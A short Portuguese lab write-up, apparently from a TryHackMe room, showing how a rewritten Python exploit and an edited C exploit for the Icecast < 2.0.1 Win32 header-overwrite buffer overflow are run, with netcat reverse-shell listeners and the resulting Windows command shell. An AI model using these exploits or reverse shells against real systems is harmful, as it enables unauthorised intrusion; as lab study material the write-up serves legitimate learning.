
Icecast Sobrescrita de Cabeçalho estouro de buffer RCE < 2.0.1 (Win32)
Python 3 - Estouro de buffer de sobrescrita de cabeçalho Icecast RCE < 2.0.1 (Win32), reescrito a partir deste módulo Metasploit. Eu reescrevi isso do módulo Metasploit porque não consegui fazer este funcionar.
Substitua o shellcode de reverse shell no exploit, chame-o com argumento para servidor e porta remotos.
root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000
Done!
Listener de reverse shell:
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
Consegui fazer o exploit original funcionar. Editado de acordo com este.
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133
Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: [email protected]
web:http://aluigi.altervista.org
shellcode add-on by Delikon
www.delikon.de
- target 192.168.92.133:8000
- send malformed data
Server IS vulnerable!!!
No listener
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>